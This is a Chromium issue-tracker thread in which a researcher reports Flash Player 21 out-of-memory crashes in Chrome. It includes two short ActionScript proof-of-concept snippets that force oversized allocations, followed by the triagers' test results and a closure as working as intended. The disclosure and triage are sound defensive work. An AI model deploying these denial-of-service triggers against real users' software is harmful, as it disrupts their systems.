Security: FlashPlayer DOS (OOM)
Reported by
appariti...@gmail.com,
Jun 3 2016
Issue description
Is Google interested in a FlashPlayer v21 (current) crash in Chrome? If so, I will provide POC details... Thanks, John Page

Jun 3 2016
This issue is just a DOS, not code execution; is this still relevant?

Jun 3 2016
We are still interested in DOS issues as these are likely bugs. I recommend you report it.
Jun 3 2016
It causes an "out of memory" exception but no access violation etc. If you still believe it worthy, I will send the details. Thank you for the replies.

Jun 3 2016
If you send the details, we will triage it as a stability bug (not as a security bug). Please do send it along.
Jun 6 2016
Sent via Gmail last Friday; I don't think it was received, so re-posting here...
OK, I am sending you some details. Just to let you know, I had already reported this to Adobe along with some other issues I found, but since it also affects FlashPlayer in Chrome too, I felt it was best to notify Chromium as well. I hope this is helpful.
Regards,
John Page (hyp3rlinx)
POC codes
=========
// Crash #1 FlashPlayer current version 21 in Google Chrome
import flash.utils.ByteArray;

DOOM(new ByteArray());

function DOOM(arr:ByteArray):void {
    // The assignment sets length to 0x41414141 (~1 GiB), forcing a huge
    // allocation; the expression's value (the new length) is then written.
    arr.writeFloat(arr.length = 0x41414141);
    // Scale position by 0x41414141 (truncated to uint) and write the result.
    arr.writeInt(arr.position *= 0x41414141);
    trace(arr); //<=== needed
}

//Crash #2 FlashPlayer current version 21 in Google Chrome
var a:Array = new Array();
trace(abc(a));

function abc(a:Array):Array {
    // Setting length makes a sparse array of 0x41414141 elements.
    a.length = 0x41414141;
    // Concatenating twelve copies requests an allocation beyond the
    // implementation limit, which ends in "out of memory".
    return a.concat(a,a,a,a,a,a,a,a,a,a,a,a);
}
Jun 7 2016
adobe-flash@ peeps: is it still useful to triage this in Chrome, if it has already been reported to Adobe?
Jun 7 2016
Well, technically adobe-flash@ is mostly Adobe folks. Adding Natalie.
Jun 7 2016
I'll leave this to the folks on the adobe-flash list, as this is a stability issue, not a security issue.
Jun 7 2016
In Chrome, an out of memory condition in Flash Player causes the plug-in to exit safely. If we're just talking about an out of memory exit, which is what I'm gathering from the comments above, this behavior is by design.
Jun 7 2016
John, can you please report/upload one of the crashes and send us the corresponding crash ID in about:crashes or about:flash?
Jun 7 2016
I enabled crash reporting and restarted Chrome, yet see no "ID" etc... Here is the FlashPlayer info:
About Flash
Google Chrome 51.0.2704.79 (m)
OS Windows 7 or Server 2008 R2 SP1 64 bit
Flash plugin 21.0.0.242 C:\Program Files (x86)\Google\Chrome\Application\51.0.2704.79\PepperFlash\pepflashplayer.dll
--- Crash data ---
--- GPU information ---
Graphics card Intel(R) HD Graphics Family
Driver display name igdumd64.dll,igd10umd64.dll,igd10umd64.dll,igdumd32,igd10umd32,igd10umd32
Driver name (strong) oem7.inf:IntelGfx.NTamd64.6.0:iSNBM0:8.15.10.2618:pci\ven_8086&dev_0116&subsys_1845103c
--- GPU driver, more information ---
Vendor Id 0x8086
Device Id 0x0116
Driver vendor Intel Corporation
Driver version 8.15.10.2618
Driver date 1-5-2012
Pixel shader version 3.0
Vertex shader version 3.0
GL_VENDOR Google Inc.
GL_RENDERER ANGLE (Intel(R) HD Graphics Family Direct3D9Ex vs_3_0 ps_3_0)
GL_VERSION OpenGL ES 2.0 (ANGLE 2.1.0.1a1b30c37e13)
GL_EXTENSIONS GL_OES_element_index_uint GL_OES_packed_depth_stencil GL_OES_get_program_binary GL_OES_rgb8_rgba8 GL_EXT_texture_format_BGRA8888 GL_EXT_read_format_bgra GL_EXT_color_buffer_half_float GL_OES_texture_half_float GL_OES_texture_half_float_linear GL_OES_texture_float GL_OES_texture_float_linear GL_EXT_texture_compression_dxt1 GL_ANGLE_texture_compression_dxt3 GL_ANGLE_texture_compression_dxt5 GL_ANGLE_depth_texture GL_OES_depth32 GL_EXT_texture_storage GL_OES_texture_npot GL_EXT_texture_filter_anisotropic GL_EXT_occlusion_query_boolean GL_NV_fence GL_EXT_robustness GL_EXT_blend_minmax GL_ANGLE_framebuffer_blit GL_ANGLE_framebuffer_multisample GL_ANGLE_instanced_arrays GL_ANGLE_pack_reverse_row_order GL_OES_standard_derivatives GL_EXT_shader_texture_lod GL_EXT_frag_depth GL_ANGLE_texture_usage GL_ANGLE_translated_shader_source GL_EXT_debug_marker GL_OES_EGL_image GL_EXT_unpack_subimage GL_NV_pack_subimage GL_OES_vertex_array_object GL_KHR_debug
Jun 7 2016
@jecl... that was my initial thought as well (FP normal exit) but wanted to pass this on anyway just to be sure.

Jun 7 2016
So I checked both POCs with current public FP 21.0.0.242 and my results are in line with Jeromie's assessment.
The first POC causes a hang, but FP recovers afterwards. The second POC causes an OOM, and then FP exits safely.
PASS: FP 21_0_r0_242 (PPAPI) in Chrome 51.0.2704.84 (32-bit) on Windows 7 x64 SP1
* poc1: "error: out of memory" is shown when attached to FP in WinDbg.
* poc2: "Implementation limit exceeded: attempting to allocate too-large object | error: out of memory" is shown in WinDbg.
PASS: FP 21_0_r0_242 (PPAPI) in Chrome 51.0.2704.84 (64-bit) on Windows 8.1 x64
* poc1: A long hang (~5 minutes) is observed, but FP recovers after that.
* poc2: "Implementation limit exceeded: attempting to allocate too-large object | error: out of memory" is shown in WinDbg.
PASS: FP 21_0_r0_242 (PPAPI) in Chrome 51.0.2704.84 (64-bit) on Windows 10 x64
* poc1: A brief hang (~30 seconds) is observed, but FP recovers after that.
* poc2: "Implementation limit exceeded: attempting to allocate too-large object | error: out of memory" is shown in WinDbg.
PASS: FP 21_0_r0_242 (PPAPI) in Chrome 51.0.2704.79 (64-bit) on Mac OS 10.10.5 x64 x86_64
* poc1: A brief hang (~18 seconds) is observed, but FP recovers after that.
* poc2: "Implementation limit exceeded: attempting to allocate too-large object | error: out of memory" is shown in WinDbg.
PASS: FP 21_0_r0_242 (PPAPI) in Chrome 51.0.2704.79 (64-bit) on Mac OS 10.11.5 x64 x86_64
* poc1: A brief hang (~20 seconds) is observed, but FP recovers after that.
* poc2: "Implementation limit exceeded: attempting to allocate too-large object | error: out of memory" is shown in WinDbg.
Jun 7 2016
I tried once more to find the crashes in the DB, hoping they may have been uploaded with some delay. I could not find them. But per 10, 11, 16 and 17 I close this as working as intended.
Jun 8 2016
Thank you for taking the time to look at this.
Jun 8 2016
John, thank you for reporting!
Sep 14 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot